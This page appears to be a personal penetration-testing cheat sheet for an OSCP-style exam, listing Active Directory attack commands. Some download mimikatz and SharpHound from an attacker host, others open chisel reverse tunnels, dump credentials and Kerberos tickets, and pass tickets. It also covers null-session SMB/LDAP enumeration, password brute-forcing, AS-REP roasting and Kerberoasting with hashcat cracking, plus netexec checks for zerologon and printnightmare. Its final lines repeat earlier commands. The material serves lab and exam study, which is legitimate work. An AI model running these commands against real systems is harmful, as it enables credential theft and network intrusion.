Checklist

ls C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\

Do this for all users on the machine

Also run winPEAS to make sure no sensitive files are missed

.\chisel.exe client 192.168.45.x:8888 R:9999:socks
.\chisel.exe client 192.168.45.x:8888 8080:127.0.0.1:80

curl 192.168.45.x/SharpHound.exe -o SharpHound.exe
.\SharpHound.exe -c all

curl 192.168.45.x/mimikatz.exe -o mimikatz.exe
.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit"

.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::tickets /export" "exit"
dir *.kirbi
kerberos::ptt <ticket>

enum4linux <IP>
enum4linux -u  -p -a -A <IP>

nmap -p 389 --script="ldap* and not brute" -Pn <IP>

 ldapsearch -H ldap://dc.offsec.com -D '' -w '' -b "dc=offsec,dc=com"

 ldapsearch -H ldap://dc.offsec.com -D '' -w '' -b "dc=offsec,dc=com" | grep -i description

netexec smb <IP> -u '' -p '' --shares
netexec smb <IP> -u '' -p '' --users
netxec ldap <IP> -u '' -p '' --password-not-required --admin-count --users --groups
netexec smb <IP> -u '' -p '' --rid-brute
netexec smb <IP> -u '' -p '' -M spider_plus
netexec smb <IP> -u '' -p '' -M printnightmare
netexec smb <IP> -u '' -p '' -M gpp_password
netexec smb <IP> -u '' -p '' -M spooler
netexec smb <IP> -u '' -p '' -M nopac
netexec smb <IP> -u '' -p '' -M zerologon

smbmap -H <IP>
smbclient -L \\\\<IP>\\ -U '' -N

rpcclient -U '' -N <IP>
rpcclient -U "username%passwd" <IP>  
querydispinfo 
queryuser joe 
querygroup 0x44f       
querygroupmem 0x44f

kerbrute userenum -d pffsec.lab /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc dc.oscp.exam

Try sorts of user:user combos, as-rep roasting, bruteforcing etc

kerbrute bruteuser -d offsec.lab ~/rockyou.txt w.smith

impacket-GetNPUsers -dc-ip <IP> -request  oscp.exam/-format hashcat
impacket-GetNPUsers oscp.exam/user -dc-ip <IP> -format hashcat
hashcat -m 18200 crackme.txt ~/rockyou.txt -O -r ~/opt/wordlists/best64.rule -O

impacket-GetUserSPNs  oscp.exam/user:pass -dc-ip 192.168.1.129 -request
hashcat -m 13100 crackme.txt ~/rockyou.txt -O -r ~/opt/wordlists/best64.rule -O

impacket-mssqlclient aerospace.com/discovery:'Start123!'@192.168.193.40
impacket-mssqlclient aerospace.com/discovery:'Start123!'@192.168.193.40 -windows-auth

bloodhound-python -d offsec.lab -u greg -p pass -ns 192.168.1.129 -c all

PreviousMisc NextInitial Attack Strategy

Last updated 4 months ago

netexec smb <IP> -u '' -p '' --shares netexec smb <IP> -u '' -p '' --users netxec ldap <IP> -u '' -p '' --password-not-required --admin-count --users --groups netexec smb <IP> -u '' -p '' --rid-brute netexec smb <IP> -u '' -p '' -M spider_plus netexec smb <IP> -u '' -p '' -M printnightmare netexec smb <IP> -u '' -p '' -M gpp_password netexec smb <IP> -u '' -p '' -M spooler netexec smb <IP> -u '' -p '' -M nopac netexec smb <IP> -u '' -p '' -M zerologon

impacket-GetNPUsers -dc-ip <IP> -request oscp.exam/-format hashcat impacket-GetNPUsers oscp.exam/user -dc-ip <IP> -format hashcat hashcat -m 18200 crackme.txt ~/rockyou.txt -O -r ~/opt/wordlists/best64.rule -O